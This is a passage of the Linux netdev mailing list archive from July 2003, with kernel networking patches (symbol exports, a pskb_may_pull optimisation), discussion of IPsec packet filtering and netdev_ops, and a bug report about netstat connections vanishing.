Patch against 2.6.0-test2 diff -Nru a/net/netsyms.c b/net/netsyms.c --- a/net/netsyms.c Wed Jul 30 12:47:00 2003 +++ b/net/netsyms.c Wed Jul 30 12:47:00 2003 @@ -513,20 +513,11 @@ #endif EXPORT_SYMBOL(rtattr_parse); -EXPORT_SYMBOL(rtnetlink_links); EXPORT_SYMBOL(__rta_fill); -EXPORT_SYMBOL(rtnetlink_dump_ifinfo); -EXPORT_SYMBOL(rtnetlink_put_metrics); -EXPORT_SYMBOL(rtnl); EXPORT_SYMBOL(neigh_delete); EXPORT_SYMBOL(neigh_add); EXPORT_SYMBOL(neigh_dump_info); -EXPORT_SYMBOL(dev_set_allmulti); -EXPORT_SYMBOL(dev_set_promiscuity); -EXPORT_SYMBOL(rtnl_sem); -EXPORT_SYMBOL(rtnl_lock); -EXPORT_SYMBOL(rtnl_unlock); /* ABI emulation layers need this */ EXPORT_SYMBOL(move_addr_to_kernel); @@ -534,7 +525,6 @@ /* Used by at least ipip.c. */ EXPORT_SYMBOL(ipv4_config); -EXPORT_SYMBOL(dev_open); /* Used by other modules */ EXPORT_SYMBOL(xrlim_allow); @@ -610,11 +600,22 @@ #endif EXPORT_SYMBOL(dev_base); EXPORT_SYMBOL(dev_base_lock); +EXPORT_SYMBOL(dev_open); EXPORT_SYMBOL(dev_close); EXPORT_SYMBOL(dev_mc_add); EXPORT_SYMBOL(dev_mc_delete); EXPORT_SYMBOL(dev_mc_upload); +EXPORT_SYMBOL(dev_set_allmulti); +EXPORT_SYMBOL(dev_set_promiscuity); EXPORT_SYMBOL(__kill_fasync); + +EXPORT_SYMBOL(rtnl); +EXPORT_SYMBOL(rtnetlink_links); +EXPORT_SYMBOL(rtnetlink_dump_ifinfo); +EXPORT_SYMBOL(rtnetlink_put_metrics); +EXPORT_SYMBOL(rtnl_sem); +EXPORT_SYMBOL(rtnl_lock); +EXPORT_SYMBOL(rtnl_unlock); #ifdef CONFIG_HIPPI EXPORT_SYMBOL(hippi_type_trans); From dax@gurulabs.com Wed Jul 30 13:37:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 13:37:10 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UKb4Fl004546 for ; Wed, 30 Jul 2003 13:37:04 -0700 Received: from randomip.foo.org (adsl-67-112-116-233.dsl.pltn13.pacbell.net [67.112.116.233]) by mail.gurulabs.com (Postfix) with ESMTP id B9F7E778B; Wed, 30 Jul 2003 14:37:02 -0600 (MDT) Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? 
From: Dax Kelson To: Andreas Jellinghaus Cc: Harald Welte , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com In-Reply-To: <1059576701.4586.20.camel@simulacron> References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> <1059576701.4586.20.camel@simulacron> Content-Type: text/plain Message-Id: <1059597421.3284.7.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 30 Jul 2003 14:37:02 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4393 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev On Wed, 2003-07-30 at 08:51, Andreas Jellinghaus wrote: > [netfilter] > incoming encrypted packets are seen as ESP/AH in INPUT > and then as decrypted packet in INPUT or FORWARD. Just to clarify, the packets will travel INPUT *twice* (once as ESP and then in the clear)? From dax@gurulabs.com Wed Jul 30 15:51:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 15:51:43 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UMpaFl015997 for ; Wed, 30 Jul 2003 15:51:37 -0700 Received: from randomip.foo.org (adsl-67-112-116-233.dsl.pltn13.pacbell.net [67.112.116.233]) by mail.gurulabs.com (Postfix) with ESMTP id 8FB1A778B; Wed, 30 Jul 2003 16:51:35 -0600 (MDT) Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? 
From: Dax Kelson To: Andreas Jellinghaus Cc: Harald Welte , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com In-Reply-To: <1059597421.3284.7.camel@mentor.gurulabs.com> References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> <1059576701.4586.20.camel@simulacron> <1059597421.3284.7.camel@mentor.gurulabs.com> Content-Type: text/plain Message-Id: <1059605494.3284.141.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 30 Jul 2003 16:51:34 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4394 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev On Wed, 2003-07-30 at 14:37, Dax Kelson wrote: > On Wed, 2003-07-30 at 08:51, Andreas Jellinghaus wrote: > > [netfilter] > > incoming encrypted packets are seen as ESP/AH in INPUT > > and then as decrypted packet in INPUT or FORWARD. > > Just to clarify, the packets will travel INPUT *twice* (once as ESP and > then in the clear)? If this is the case, then I see a problem. If you have an explicit drop/reject at the bottom of INPUT (or have a DROP policy), then no IPSEC traffic would be allowed. I suppose you could add a rule that allowed all ESP traffic before the explicit drop. Dax From davem@redhat.com Wed Jul 30 16:02:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:02:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UN2eFl017065 for ; Wed, 30 Jul 2003 16:02:40 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id PAA03408; Wed, 30 Jul 2003 15:58:45 -0700 Date: Wed, 30 Jul 2003 15:58:44 -0700 From: "David S. 
Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, hch@infradead.org, netdev@oss.sgi.com Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Message-Id: <20030730155844.43ca22d9.davem@redhat.com> In-Reply-To: <200307301435.h6UEZDsG010062@ginger.cmf.nrl.navy.mil> References: <20030730102437.B3901@infradead.org> <200307301435.h6UEZDsG010062@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4395 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 10:32:31 -0400 chas williams wrote: > In message <20030730102437.B3901@infradead.org>,Christoph Hellwig writes: > >On Tue, Jul 29, 2003 at 10:33:27PM -0700, David S. Miller wrote: > >Hmm, this looks like a fix for modular compilation and should > >probably go into 2.4.22.. > > i would prefer it to be applied to 2.4.22 but if it cant be done > it cant be done. i am not pressed. Modular ATM is a new attribute of 2.4.22, so if it is broken in some way we are no worse off than we were in 2.4.21. I really don't consider this critical at all. And itsy bitsy fixes like this continually pouring into Marcelo's tree in late stages are why his releases get delayed for so long, and I'm not going to contribute to that problem. 
From shemminger@osdl.org Wed Jul 30 16:19:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:19:14 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNJ6Fl018482 for ; Wed, 30 Jul 2003 16:19:07 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6UNIsI27725; Wed, 30 Jul 2003 16:18:54 -0700 Date: Wed, 30 Jul 2003 16:18:54 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] add likely/unlikely to pskb_may_pull Message-Id: <20030730161854.3cb03258.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4396 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Code that deals with received headers needs to be robust, so it uses pskb_may_pull in many places. Except in the case of DoS attacks, the packets are always correctly formed, so optimize for that case. 
diff -Nru a/include/linux/skbuff.h b/include/linux/skbuff.h --- a/include/linux/skbuff.h Wed Jul 30 15:50:31 2003 +++ b/include/linux/skbuff.h Wed Jul 30 15:50:31 2003 @@ -904,9 +904,9 @@ static inline int pskb_may_pull(struct sk_buff *skb, unsigned int len) { - if (len <= skb_headlen(skb)) + if (likely(len <= skb_headlen(skb))) return 1; - if (len > skb->len) + if (unlikely(len > skb->len)) return 0; return __pskb_pull_tail(skb, len-skb_headlen(skb)) != NULL; } From phased@mail.ru Wed Jul 30 16:23:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:23:57 -0700 (PDT) Received: from f9.mail.ru (f9.mail.ru [194.67.57.39]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNNmFl019128 for ; Wed, 30 Jul 2003 16:23:49 -0700 Received: from mail by f9.mail.ru with local id 19i0IM-000Mrl-00; Thu, 31 Jul 2003 03:23:46 +0400 Received: from [81.135.43.160] by eng.mail.ru with HTTP; Thu, 31 Jul 2003 03:23:46 +0400 From: =?koi8-r?Q?=22?=phased=?koi8-r?Q?=22=20?= To: netdev@oss.sgi.com Cc: linux-net@vger.kernel.org, davem@redhat.com, kuznet@ms2.inr.ac.ru, jmorris@intercode.com.au Subject: wierd netstat(/proc/net) behaviour Mime-Version: 1.0 X-Mailer: mPOP Web-Mail 2.19 X-Originating-IP: [81.135.43.160] Date: Thu, 31 Jul 2003 03:23:46 +0400 Reply-To: =?koi8-r?Q?=22?=phased=?koi8-r?Q?=22=20?= Content-Type: multipart/mixed; boundary="----JCeecgNp-TbYPINj0y99GJLqb:1059607426" Message-Id: X-archive-position: 4397 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: phased@mail.ru Precedence: bulk X-list: netdev ------JCeecgNp-TbYPINj0y99GJLqb:1059607426 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Whilst testing the 2.6.0-test1 kernel (sorry, I am currently on dialup and have not had a chance to test it on test2 yet), I experienced some very odd behaviour, namely entries vanishing from the list of established TCP connections. 
Please read the attached file if this interests you; it is just one transcript of the behaviour, although I have experienced it several times. I do not believe the host has been compromised: I have compared the md5sum of netstat on both my own and a friend's installation of Debian woody and both produce the same sum. As far as I am aware, no one has yet developed kernel-level malware (in the form of LKMs) for this version of the kernel, and the erratic behaviour seems inconsistent with what a compromise would produce. fd2c999a20b1e9bbb395ee8389208923 /bin/netstat -rwxr-xr-x 1 root root 86892 Nov 24 2001 /bin/netstat I apologise if this is the wrong place to send such a bug report; if so, could you please forward it to the appropriate person? Regards phased ------JCeecgNp-TbYPINj0y99GJLqb:1059607426 Content-Type: application/octet-stream; name="netstatbug" Content-Disposition: attachment; filename="netstatbug" Content-Transfer-Encoding: base64 ClF1aWNrIG92ZXJ2aWV3IG9mIHdpZXJkIGNvbm5lY3Rpb24gbW9uaXRvcmluZyBiZWhhdmlvdXIK YnkgbWlzdGVyeAoKVXNpbmcga2VybmVsIDIuNi4wLXRlc3QxCgpjdXJyZW50bHkgdGhlcmUgaXMg YSBicm93c2VyIG9wZW4gdG8gMjA3LjE2Ni4yMDMuMTYwCmFuZCBhbiBJUkMgY29ubmVjdGlvbiB0 byAxOTUuNzEuOTkuMjEzCmJ1dCB0aGVyZSBpcyBhbHNvIGEgYm5jIGNvbm5lY3Rpb24gdG8gcG9y dCAxIG9mIDIxNi4xNDIuMjM3LjgwIG9mIHdoaWNoCmlzIG5vdyBzaG93aW5nIGluIHRoZSBsaXN0 CgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAg ICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTA1ICAgICAgMjA3LjE2Ni4yMDMuMTYwOjgwICAg ICAgRVNUQUJMSVNIRUQgCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTEzICAg ICAgMTk1LjcxLjk5LjIxMzo2NjY3ICAgICAgRVNUQUJMSVNIRUQgCmJpZ2JveTovaG9tZS9taXN0 ZXJ4IyAKCgpvayBsZXRzIGNsb3NlIGFsbCBjb25uZWN0aW9ucwoKYmlnYm95Oi9ob21lL21pc3Rl cngjIG5ldHN0YXQgLWFuIHwgZ3JlcCBFU1RBQgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgCgpJIG9w ZW4gYW4gc3NoIGNvbm5lY3Rpb24gdG8gYSByZW1vdGUgc3lzdGVtCgpiaWdib3k6L2hvbWUvbWlz dGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2 
OC40MS4yOjQzOTE2ICAgICAgMTkyLjE2OC40MS45OjIyICAgICAgICAgRVNUQUJMSVNIRUQgCmJp Z2JveTovaG9tZS9taXN0ZXJ4IyAKCm5vdyBpIGFkZCBhIGNvbm5lY3Rpb24gdG8gcG9ydCAxMzUg b24gYSBkaWZmZXJlbnQgc3lzdGVtCgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4g fCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTE3ICAgICAg MTkyLjE2OC40MS4xOjEzNSAgICAgICAgRVNUQUJMSVNIRUQgCnRjcCAgICAgICAgMCAgICAgIDAg MTkyLjE2OC40MS4yOjQzOTE2ICAgICAgMTkyLjE2OC40MS45OjIyICAgICAgICAgRVNUQUJMSVNI RUQgCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyAKCk5vdyBJIG9wZW4gYW5vdGhlciBjb25uZWN0aW9u IHRvIDE5Mi4xNjguNDEuOSBhbmQgMTkyLjE2OC40MS4xIG9uIHBvcnRzIDIyCmFuZCAxMzUsIHRo ZW4gY2xvc2UgdGhlbSBhbmQgd2FpdCBhIHdoaWxlCgpvayBsZXRzIHRyeSBuZXRzdGF0IGFnYWlu CgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAg ICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTE2ICAgICAgMTkyLjE2OC40MS45OjIyICAgICAg ICAgRVNUQUJMSVNIRUQgCgpXaGVyZSBoYXMgdGhlIGNvbm5lY3Rpb24gdG8gcG9ydCAxMzUgZ29u ZSwgdGhlIGNsaWVudCBpcyBzdGlsbCBvcGVuCjE5Mi4xNjguNDEuOToyMiBoYXMgdGltZWQgb3V0 IG5vdywgbGV0cyBkbyBuZXRzdGF0IGFnYWluCgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3Rh dCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTE3 ICAgICAgMTkyLjE2OC40MS4xOjEzNSAgICAgICAgRVNUQUJMSVNIRUQgCgpUaGUgY29ubmVjdGlv biB0byAxOTIuMTY4LjQxLjEgb24gcG9ydCAxMzUgaGFzIHJlYXBwZWFyZWQKSSBjb25uZWN0IHRv IGFuIElSQyBzZXJ2ZXIKCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyBuZXRzdGF0IC1hbiB8IGdyZXAg RVNUQUIKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4LjQxLjI6NDM5MjQgICAgICAyMTMuNDgu MTUwLjE6NjY2NyAgICAgICBFU1RBQkxJU0hFRCAKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4 LjQxLjI6NDM5MjIgICAgICAxOTIuMTY4LjQxLjE6MTM1ICAgICAgICBFU1RBQkxJU0hFRCAKYmln Ym95Oi9ob21lL21pc3RlcngjIAoKbmV0c3RhdCBvdXRwdXQgaXMgYXMgd2UgZXhwZWN0CkkgdGhl biBjb25uZWN0IHRvIGFub3RoZXIgaXJjIHNlcnZlciwgaXJjLm9mdGMubmV0IG9uIHBvcnQgNjY2 NyBhbHNvCgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRj cCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTI0ICAgICAgMjEzLjQ4LjE1MC4xOjY2 
NjcgICAgICAgRVNUQUJMSVNIRUQgCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQz OTI1ICAgICAgMTk1LjcxLjk5LjIxMzo2NjY3ICAgICAgRVNUQUJMSVNIRUQgCmJpZ2JveTovaG9t ZS9taXN0ZXJ4IyAKCk9rLCB3aGVyZXMgdGhhdCAxMzUgZ29uZSBhZ2FpbiEKSSBvcGVuIGEgY29u bmVjdGlvbiB0byBhIGhvc3Qgb24gcG9ydCAyMiBhZ2FpbiwgdGhhdHMgdGhlcmUgb2sKCmJpZ2Jv eTovaG9tZS9taXN0ZXJ4IyBuZXRzdGF0IC1hbiB8IGdyZXAgRVNUQUIKdGNwICAgICAgICAwICAg ICAgMCAxOTIuMTY4LjQxLjI6NDM5MjQgICAgICAyMTMuNDguMTUwLjE6NjY2NyAgICAgICBFU1RB QkxJU0hFRCAKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4LjQxLjI6NDM5MjUgICAgICAxOTUu NzEuOTkuMjEzOjY2NjcgICAgICBFU1RBQkxJU0hFRCAKdGNwICAgICAgICAwICAgICAgMCAxOTIu MTY4LjQxLjI6NDM5MjYgICAgICAxOTIuMTY4LjQxLjk6MjIgICAgICAgICBFU1RBQkxJU0hFRCAK YmlnYm95Oi9ob21lL21pc3RlcngjIAoKSSB0aGVuIGNsb3NlIGl0CgpiaWdib3k6L2hvbWUvbWlz dGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2 OC40MS4yOjQzOTI0ICAgICAgMjEzLjQ4LjE1MC4xOjY2NjcgICAgICAgRVNUQUJMSVNIRUQgCnRj cCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTI1ICAgICAgMTk1LjcxLjk5LjIxMzo2 NjY3ICAgICAgRVNUQUJMSVNIRUQgCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyAKCkFsbCBzZWVtcyBp biBvcmRlciwgYnV0IDEzNSdzIGNsaWVudCBpcyBzdGlsbCBvcGVuLCB0aGUgYm94IGl0IGlzIGNv bm5lY3RpbmdmCnRvIHNob3cgaXQsIGluIGl0cyBvd24gbmV0c3RhdCBhcyBlc3RhYmxpc2hlZAoK bWlzdGVyeEBiaWdib3k6fiQgZGF0ZQpUaHUgSnVsIDMxIDAwOjI3OjE3IEJTVCAyMDAzCm1pc3Rl cnhAYmlnYm95On4kIAoKSW4gdGhpcyB0aHJlZSBtaW51dGUgcHJlcmlvZCBJIGNvbm5lY3RlZCB0 byBzaGVsbDEuY2Izcm9iLm5ldCBvbiBwb3J0IDIzCmFuZCB3d3cuY2Izcm9iLm5ldCBvbiBwb3J0 IDgwIGFuZCBlbmcubWFpbC5ydSBvbiBwb3J0IDgwLCBhbGwgbmV0c3RhdHMKd2VyZSBmaW5lIHdo aWxzdCBvbiB0aGVzZSBzaXRlcywgd2hlbiBpIGRpc2Nvbm5lY3RlZCBmcm9tIGVuZy5tYWlsLnJ1 CkkgZ290IHRoaXMKCm1pc3RlcnhAYmlnYm95On4kIGRhdGUKVGh1IEp1bCAzMSAwMDozMDo1NSBC U1QgMjAwMwptaXN0ZXJ4QGJpZ2JveTp+JCAKCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyBuZXRzdGF0 IC1hbiB8IGdyZXAgRVNUQUIKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4LjQxLjI6NDM5MjQg ICAgICAyMTMuNDguMTUwLjE6NjY2NyAgICAgICBFU1RBQkxJU0hFRCAKdGNwICAgICAgICAwICAg 
ICAgMCAxOTIuMTY4LjQxLjI6NDM5MjIgICAgICAxOTIuMTY4LjQxLjE6MTM1ICAgICAgICBFU1RB QkxJU0hFRCAKYmlnYm95Oi9ob21lL21pc3RlcngjIAoKVEh0YSBwb3J0IDEzNSBoYXMgYXBwZWFy ZWQgYWdhaW4sIGFuZCBvZnRjLm5ldCBoYXMgdmFubmlzaGVkIGV2ZW4gdGhvdWdoCkxldHMgc2Vu ZCBteXNlbGYgYSBwaW5nIG9uIElSQyB0byBzZWUgaWYgaSBhbSBzdGlsbCB0aGVyZQoKW2N0Y3Ao bWlzdGVyeCldIFBJTkcKPj4+IG1pc3RlcnggW35taXN0ZXJ4QDIxMy4xMjIuMTM1LjExN10gcmVx dWVzdGVkIFBJTkcgMTA1OTYwODAwMiAyOTAwMDIgZnJvbQogICAgICAgICAgbWlzdGVyeAoKYmln Ym95Oi9ob21lL21pc3RlcngjIG5ldHN0YXQgLWFuIHwgZ3JlcCBFU1RBQgp0Y3AgICAgICAgIDAg ICAgICAwIDE5Mi4xNjguNDEuMjo0MzkyNCAgICAgIDIxMy40OC4xNTAuMTo2NjY3ICAgICAgIEVT VEFCTElTSEVEIAp0Y3AgICAgICAgIDAgICAgICAwIDE5Mi4xNjguNDEuMjo0MzkyNSAgICAgIDE5 NS43MS45OS4yMTM6NjY2NyAgICAgIEVTVEFCTElTSEVEIApiaWdib3k6L2hvbWUvbWlzdGVyeCMg CgpOb3cgbmV0c3RhdCBoYXMgY2hhbmdlZCBhZ2FpbiBhbmQgMTM1IGhhcyB2YW5uaXNoZWQgZXZl biB0aG91Z2h0IGl0IGlzCnN0aWxsIG9wZW4sIGlzIHRoZSBrZXJuZWwgZHJvcHBpbmcgImlkbGUi IGNvbm5lY3Rpb25zIG9mZiB0aGUgbGlzdCBldmVuCnRob3VnaCB0aGV5IGFyZSBzdGlsbCBhY3R1 YWxseSBjb25uZWN0ZWQ/CgpUaGlzIGlzIGp1c3Qgb25lIHRyYW5zY3JpcHQgb2Ygd2llcmQgYmVo YXZpb3IKCg== ------JCeecgNp-TbYPINj0y99GJLqb:1059607426-- From acme@conectiva.com.br Wed Jul 30 16:32:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:32:37 -0700 (PDT) Received: from brinquendo.conectiva.com.br (pierdol.ninka.net [216.101.162.243]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNWWFl020021 for ; Wed, 30 Jul 2003 16:32:33 -0700 Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 58E861966C; Wed, 30 Jul 2003 23:35:43 +0000 (UTC) Date: Wed, 30 Jul 2003 20:35:42 -0300 From: Arnaldo Carvalho de Melo To: Matthew Wilcox Cc: netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-ID: <20030730233541.GB7057@conectiva.com.br> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: 
<20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> X-Url: http://advogato.org/person/acme Organization: Conectiva S.A. User-Agent: Mutt/1.5.4i X-archive-position: 4398 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev Em Wed, Jul 30, 2003 at 07:44:16PM +0100, Matthew Wilcox escreveu: > I think there's still scope for a netdev_ops patch, but it's of dubious value > and more of a 2.7 project. OK with me, I mentioned this in a brainstorm and thought of it as a 2.7 thing anyway. - Arnaldo From davem@redhat.com Wed Jul 30 16:45:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:45:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNjAFl021651 for ; Wed, 30 Jul 2003 16:45:11 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03527; Wed, 30 Jul 2003 16:41:09 -0700 Date: Wed, 30 Jul 2003 16:41:08 -0700 From: "David S. 
Miller" To: Arnaldo Carvalho de Melo Cc: willy@debian.org, netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-Id: <20030730164108.06062b72.davem@redhat.com> In-Reply-To: <20030730233541.GB7057@conectiva.com.br> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <20030730233541.GB7057@conectiva.com.br> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4399 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 20:35:42 -0300 Arnaldo Carvalho de Melo wrote: > Em Wed, Jul 30, 2003 at 07:44:16PM +0100, Matthew Wilcox escreveu: > > I think there's still scope for a netdev_ops patch, but it's of dubious value > > and more of a 2.7 project. > > OK with me, I mentioned this in a brainstorm and thought of it as a 2.7 thing > anyway. I'm ok with the simplified ethtool-only version too. Although I'm confused about what kind of problem there is with netdev_ops being such a "large structure". This is the kind of thing there'd be _ONE_ copy of in each driver, ala. struct netdev_ops tg3_netdev_ops { ... .foo = tg3_foo, ... }; ... tp->dev->netdev_ops = &tg3_netdev_ops; ... Right? From davem@redhat.com Wed Jul 30 16:55:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:55:47 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNthFl022672 for ; Wed, 30 Jul 2003 16:55:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03625; Wed, 30 Jul 2003 16:52:09 -0700 Date: Wed, 30 Jul 2003 16:52:09 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] export correct symbols when INET not enabled Message-Id: <20030730165209.0f5b7094.davem@redhat.com> In-Reply-To: <20030730125135.6b5d1945.shemminger@osdl.org> References: <20030730125135.6b5d1945.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4401 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 12:51:35 -0700 Stephen Hemminger wrote: > Several symbols relating to multicast and netlink were hidden incorrectly under CONFIG_INET > when in fact they are needed now by drivers and available even without TCP/IP. Applied, thanks Stephen. From davem@redhat.com Wed Jul 30 16:55:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:55:24 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNtKFl022609 for ; Wed, 30 Jul 2003 16:55:20 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03593; Wed, 30 Jul 2003 16:49:07 -0700 Date: Wed, 30 Jul 2003 16:49:07 -0700 From: "David S. 
